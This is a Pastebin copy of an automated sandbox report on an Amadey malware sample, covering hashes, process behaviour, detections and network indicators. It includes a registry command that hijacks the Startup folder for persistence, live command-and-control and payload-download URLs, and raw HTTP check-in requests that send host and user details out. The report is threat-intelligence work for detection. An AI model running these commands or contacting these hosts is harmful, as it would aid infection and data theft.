API tools faq
paste
Advertisement
paladin316

800Exes_f3a4609666def1d9102913afea0bdd78_exe_2019-09-03_10_30.txt

paladin316
Sep 3rd, 2019
1,479
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.91 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 800
  3. * MalFamily: "Amadey"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_f3a4609666def1d9102913afea0bdd78.exe"
  8. * File Size: 434176
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "c059075babf0ce7b306718f6f2ae03a4d14a89970d875f85bd1fdcdeb25751f6"
  11. * MD5: "f3a4609666def1d9102913afea0bdd78"
  12. * SHA1: "ca9d917b207a945f4889b80b3b275b2721255b49"
  13. * SHA512: "837c60d895cb6aaa3bc9b53fd06f4986c6afcfb4f7075b645942a8c4eacb99ad982478b7fdca1b6b5858f6167948070d3aad11a5393e9eb3fef17adc34057400"
  14. * CRC32: "185B47AE"
  15. * SSDEEP: "6144:p7cOWf9SpYJjjfTQH3z680cmhE4Uy0fEmfnkDLOtCsa8DKnAd21jedguVFOQp:pB6SpQju7SDLOtCs6nAE1jQ"
  16.  
  17. * Process Execution:
  18. "e1gCq.exe",
  19. "e1gCq.exe",
  20. "kntd.exe",
  21. "kntd.exe",
  22. "reg.exe",
  23. "TIL13KLESDA.exe",
  24. "\u0570\u043b\u10e5\u10d0\u10e0\u10d7\u10e3\u10da\u10d8.exe",
  25. "svchost.exe",
  26. "services.exe",
  27. "lsass.exe"
  28.  
  29.  
  30. * Executed Commands:
  31. "c:\\programdata\\968b2ad0a1\\kntd.exe",
  32. "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\968b2ad0a1",
  33. "C:\\Users\\user\\AppData\\Local\\Temp\\TIL13KLESDA.exe",
  34. "\"C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe\"",
  35. "C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe ",
  36. "C:\\Windows\\system32\\svchost.exe",
  37. "C:\\Windows\\system32\\lsass.exe"
  38.  
  39.  
  40. * Signatures Detected:
  41.  
  42. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  43. "Details":
  44.  
  45.  
  46. "Description": "Behavioural detection: Executable code extraction",
  47. "Details":
  48.  
  49.  
  50. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  51. "Details":
  52.  
  53. "IP_ioc": "212.42.121.51:80 (Kyrgyzstan)"
  54.  
  55.  
  56.  
  57.  
  58. "Description": "Creates RWX memory",
  59. "Details":
  60.  
  61.  
  62. "Description": "Reads data out of its own binary image",
  63. "Details":
  64.  
  65. "self_read": "process: e1gCq.exe, pid: 2692, offset: 0x00000000, length: 0x00033000"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "A process created a hidden window",
  71. "Details":
  72.  
  73. "Process": "e1gCq.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\e1gCq.exe"
  74.  
  75.  
  76. "Process": "kntd.exe -> c:\\programdata\\968b2ad0a1\\kntd.exe"
  77.  
  78.  
  79. "Process": "TIL13KLESDA.exe -> C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe"
  80.  
  81.  
  82.  
  83.  
  84. "Description": "Drops a binary and executes it",
  85. "Details":
  86.  
  87. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\TIL13KLESDA.exe"
  88.  
  89.  
  90. "binary": "C:\\programdata\\968b2ad0a1\\kntd.exe"
  91.  
  92.  
  93.  
  94.  
  95. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  96. "Details":
  97.  
  98. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  99.  
  100.  
  101. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  102.  
  103.  
  104. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  105.  
  106.  
  107. "suspicious_request_iocs": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php"
  108.  
  109.  
  110. "suspicious_request_iocs": "http://paqsource.com/till15/TIL13KLESDA.exe"
  111.  
  112.  
  113.  
  114.  
  115. "Description": "Performs some HTTP requests",
  116. "Details":
  117.  
  118. "url_iocs": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php"
  119.  
  120.  
  121. "url_iocs": "http://paqsource.com/till15/TIL13KLESDA.exe"
  122.  
  123.  
  124.  
  125.  
  126. "Description": "Uses Windows utilities for basic functionality",
  127. "Details":
  128.  
  129. "command": "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\968b2ad0a1"
  130.  
  131.  
  132.  
  133.  
  134. "Description": "Behavioural detection: Injection (Process Hollowing)",
  135. "Details":
  136.  
  137. "Injection": "e1gCq.exe(1732) -> e1gCq.exe(2692)"
  138.  
  139.  
  140.  
  141.  
  142. "Description": "Executed a process and injected code into it, probably while unpacking",
  143. "Details":
  144.  
  145. "Injection": "e1gCq.exe(1732) -> e1gCq.exe(2692)"
  146.  
  147.  
  148.  
  149.  
  150. "Description": "Behavioural detection: Injection (inter-process)",
  151. "Details":
  152.  
  153.  
  154. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  155. "Details":
  156.  
  157. "Process": "kntd.exe tried to sleep 2399 seconds, actually delayed analysis time by 0 seconds"
  158.  
  159.  
  160.  
  161.  
  162. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  163. "Details":
  164.  
  165. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 542984 times"
  166.  
  167.  
  168.  
  169.  
  170. "Description": "Likely virus infection of existing system binary",
  171. "Details":
  172.  
  173. "file": "c:\\programdata\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe"
  174.  
  175.  
  176.  
  177.  
  178. "Description": "Attempts to identify installed AV products by installation directory",
  179. "Details":
  180.  
  181. "file": "C:\\ProgramData\\AVAST Software"
  182.  
  183.  
  184. "file": "C:\\ProgramData\\Avira"
  185.  
  186.  
  187. "file": "C:\\ProgramData\\Kaspersky Lab"
  188.  
  189.  
  190. "file": "C:\\ProgramData\\ESET"
  191.  
  192.  
  193. "file": "C:\\ProgramData\\Panda Security"
  194.  
  195.  
  196. "file": "C:\\ProgramData\\Bitdefender"
  197.  
  198.  
  199. "file": "C:\\ProgramData\\AVG"
  200.  
  201.  
  202. "file": "C:\\ProgramData\\Doctor Web"
  203.  
  204.  
  205.  
  206.  
  207. "Description": "File has been identified by 28 Antiviruses on VirusTotal as malicious",
  208. "Details":
  209.  
  210. "MicroWorld-eScan": "Gen:Variant.Graftor.632360"
  211.  
  212.  
  213. "FireEye": "Generic.mg.f3a4609666def1d9"
  214.  
  215.  
  216. "Cylance": "Unsafe"
  217.  
  218.  
  219. "SUPERAntiSpyware": "Trojan.Agent/Gen-TrickBot"
  220.  
  221.  
  222. "K7AntiVirus": "Trojan ( 00556fa91 )"
  223.  
  224.  
  225. "K7GW": "Trojan ( 00556fa91 )"
  226.  
  227.  
  228. "Arcabit": "Trojan.Graftor.D9A628"
  229.  
  230.  
  231. "Symantec": "Packed.Generic.516"
  232.  
  233.  
  234. "APEX": "Malicious"
  235.  
  236.  
  237. "Kaspersky": "Trojan-Downloader.Win32.Deyma.ano"
  238.  
  239.  
  240. "BitDefender": "Gen:Variant.Graftor.632360"
  241.  
  242.  
  243. "Rising": "Trojan.Generic@ML.89 (RDML:KU/SGocyZ85q4pjWJhL/kg)"
  244.  
  245.  
  246. "Ad-Aware": "Gen:Variant.Graftor.632360"
  247.  
  248.  
  249. "Emsisoft": "Gen:Variant.Graftor.632360 (B)"
  250.  
  251.  
  252. "F-Secure": "Trojan.TR/AD.Zlob.enzyp"
  253.  
  254.  
  255. "TrendMicro": "TROJ_GEN.R050C0WI219"
  256.  
  257.  
  258. "Avira": "TR/AD.Zlob.enzyp"
  259.  
  260.  
  261. "ZoneAlarm": "Trojan-Downloader.Win32.Deyma.ano"
  262.  
  263.  
  264. "GData": "Gen:Variant.Graftor.632360"
  265.  
  266.  
  267. "ALYac": "Gen:Variant.Graftor.632360"
  268.  
  269.  
  270. "MAX": "malware (ai score=86)"
  271.  
  272.  
  273. "Panda": "Trj/GdSda.A"
  274.  
  275.  
  276. "ESET-NOD32": "a variant of Win32/Kryptik.GWAS"
  277.  
  278.  
  279. "TrendMicro-HouseCall": "TROJ_GEN.R050C0WI219"
  280.  
  281.  
  282. "Ikarus": "Trojan.Win32.Trickbot"
  283.  
  284.  
  285. "Fortinet": "W32/GenKryptik.DRLU!tr"
  286.  
  287.  
  288. "AVG": "Win32:TrojanX-gen Trj"
  289.  
  290.  
  291. "Avast": "Win32:TrojanX-gen Trj"
  292.  
  293.  
  294.  
  295.  
  296. "Description": "Creates a copy of itself",
  297. "Details":
  298.  
  299. "copy": "C:\\programdata\\968b2ad0a1\\kntd.exe"
  300.  
  301.  
  302.  
  303.  
  304. "Description": "Created network traffic indicative of malicious activity",
  305. "Details":
  306.  
  307. "signature": "ET TROJAN Amadey CnC Check-In"
  308.  
  309.  
  310.  
  311.  
  312.  
  313. * Started Service:
  314. "KeyIso"
  315.  
  316.  
  317. * Mutexes:
  318. "Global\\838B6C9EB27932960"
  319.  
  320.  
  321. * Modified Files:
  322. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
  323. "C:\\ProgramData\\0",
  324. "C:\\programdata\\968b2ad0a1\\kntd.exe",
  325. "C:\\programdata\\968b2ad0a1\\kntd.exe:Zone.Identifier",
  326. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\TIL13KLESDA1.exe",
  327. "C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe",
  328. "C:\\Windows\\sysnative\\LogFiles\\Scm\\9cdf079f-d488-47e0-8840-9a3500f1bbe4"
  329.  
  330.  
  331. * Deleted Files:
  332.  
  333. * Modified Registry Keys:
  334. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
  335.  
  336.  
  337. * Deleted Registry Keys:
  338.  
  339. * DNS Communications:
  340.  
  341. "type": "A",
  342. "request": "paqsource.com",
  343. "answers":
  344.  
  345. "data": "212.42.121.51",
  346. "type": "A"
  347.  
  348.  
  349.  
  350.  
  351.  
  352. * Domains:
  353.  
  354. "ip": "212.42.121.51",
  355. "domain": "paqsource.com"
  356.  
  357.  
  358.  
  359. * Network Communication - ICMP:
  360.  
  361. * Network Communication - HTTP:
  362.  
  363. "count": 34,
  364. "body": "id=2818818937&sd=4cf169&vs=1.41&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  365. "uri": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  366. "user-agent": "",
  367. "method": "POST",
  368. "host": "51.15.202.245",
  369. "version": "1.1",
  370. "path": "/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  371. "data": "POST /1a2d9426-59f2-4ca2-a640-25633c660631/index.php HTTP/1.1\r\nHost: 51.15.202.245\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=4cf169&vs=1.41&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  372. "port": 80
  373.  
  374.  
  375. "count": 1,
  376. "body": "",
  377. "uri": "http://paqsource.com/till15/TIL13KLESDA.exe",
  378. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  379. "method": "GET",
  380. "host": "paqsource.com",
  381. "version": "1.1",
  382. "path": "/till15/TIL13KLESDA.exe",
  383. "data": "GET /till15/TIL13KLESDA.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: paqsource.com\r\nConnection: Keep-Alive\r\n\r\n",
  384. "port": 80
  385.  
  386.  
  387. "count": 1,
  388. "body": "d1=1000028001&",
  389. "uri": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  390. "user-agent": "",
  391. "method": "POST",
  392. "host": "51.15.202.245",
  393. "version": "1.1",
  394. "path": "/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  395. "data": "POST /1a2d9426-59f2-4ca2-a640-25633c660631/index.php HTTP/1.1\r\nHost: 51.15.202.245\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 14\r\n\r\nd1=1000028001&",
  396. "port": 80
  397.  
  398.  
  399.  
  400. * Network Communication - SMTP:
  401.  
  402. * Network Communication - Hosts:
  403.  
  404. "country_name": "France",
  405. "ip": "51.15.202.245",
  406. "inaddrarpa": "",
  407. "hostname": ""
  408.  
  409.  
  410. "country_name": "Kyrgyzstan",
  411. "ip": "212.42.121.51",
  412. "inaddrarpa": "",
  413. "hostname": "paqsource.com"
  414.  
  415.  
  416.  
  417. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!